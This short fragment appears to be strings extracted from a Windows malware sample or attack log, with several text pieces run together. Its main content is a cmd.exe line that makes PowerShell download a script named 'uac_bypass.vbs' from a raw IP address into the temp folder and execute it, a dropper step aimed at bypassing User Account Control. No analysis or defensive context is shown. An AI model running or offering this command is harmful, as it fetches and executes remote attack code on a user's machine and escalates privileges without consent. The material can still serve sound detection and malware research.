Windows
System32
cmd.exe
C:\Windows\System32\cmd.exe
C:\Windows\System32d/c powershell.exe iwr -outf %tmp%\\bypass.vbs http://212.57.37.63/uac_bypass.vbs & %tmp%\\bypass.vbsC:\Windows\System32\notepad.exe